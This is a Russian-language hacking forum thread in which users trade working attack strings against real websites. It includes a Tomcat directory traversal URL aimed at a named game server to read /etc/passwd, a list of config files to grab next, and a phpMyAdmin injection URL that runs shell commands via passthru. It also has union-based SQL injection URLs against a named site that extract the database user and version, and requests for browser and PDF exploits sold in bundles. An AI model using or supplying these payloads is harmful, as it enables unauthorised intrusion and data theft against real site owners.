Здравствуйте нашел уязвимость Apache Tomcat v.5.5.26 Directory Traversal на одном игровом сервере http://la2midland.ru вот и мне сканер выдает такую строку http://la2midland.ru:80/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd что с этим можно сделать?
Где он читает файлы? покажи мне содержимое файла..етс пассв который он прочитал?....Лично он мне ничего не выдал.... Поэтому поиметь с этого ничего нельзя.
в принципе в etc/passwd храняися пассы но зашифрование... так же можеш поискать такие полезности как: /etc/httpd/conf/httpd.conf /etc/php.ini /etc/hosts /etc/my.conf дальше сам гляди, у меня сайт вапще не открылся =/
2 -m0rgan- мне кажется что в etc/passwd нету ничего интересного, а пассы вроде в shadow хранятся 2 DimOnOID ты прав, мне тоже ничего не выдало, но увидев /etc/passwd дал ответ иcxодя из собственных соображений
/etc/passwd Уже стотыщь лет не хранит хешши паролей..и не обяз в папке /etc/ будут лежать эти файлы..на каждой машине они как правило по разному.. Gorev угу..а на shadow прав не хватит.
По дефолту, а по дефолту чаще всего, они лежат в /etc/ =) >>/etc/passwd Уже стотыщь лет не хранит хешши паролей точно не знаюсь на апаче но что то там расшифровуют)
Скажите пожалуйста, есть ли в паблике эксплоиты Snapshot (ie6,ie7), util.printf (pdf), Collab.collectEmailInfo (pdf). Эксплоиты продаются в различных связках, но дата продаж - старая, а сплоиты актуальны. Черкните в ЛС, если кто может помочь. Общеобразовательный вопрос: как происходит внедрение ява-скрипт эксплоита в сам файл .pdf (к вопросу о pdf-эксплоитов)?
Code: Как использовать дыру в пхпмайадминке?: http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by=%22])%20OR%20passthru($_GET[ccmd]);%20//&sort_order=desc&token=[my_valid_token]&ccmd=ls Мне выдаёт в Доступе отказано.Че за токен ставить я не знаю =_=.Посему прописал так,как выше...Версия 2.9.1.1
token - параметр в адресной строке. Например так - http://localhost/phpmyadmin/index.php?db=mysql&token=206136e5c98e1cd2fa26fbd104ebc700
http://comunist.md/index.php?idPaper=89/**/union+select+1,2,3,4,5,6,7+limit+1,1-- Обьясните пожалуйста зачем ставить в конце запроса limit+1,1 . Почему не работает без LIMIT ? (когда не получилось руками запустил в програме Sql Injection tool , и там есть галочка типа - использовать Limit 1,1 )
Всё отлично работает http://comunist.md/index.php?idPaper=-89 union select 1,2,concat_ws(0x3a,User(),Database(),Version()),4,5,6,7--+
А всётаки зачем в Sql injection tool 4 есть параметр LIMIT 1,1 ? Почему например в моем случае надо его ставить,как именно я составил запрос. (я забыл что надо ставить несуществуюшие данные типа idPaper=-89 ) И что означает {1} (сами ковычки { } ) в проге Sql injection tool ?: Printable fields : {1},3,4,5,6,7
Printable fields ( ака печатное поле) скобками ты выделяешь столбец в который выводить данные {1},3,4,5,6,7 - в перввый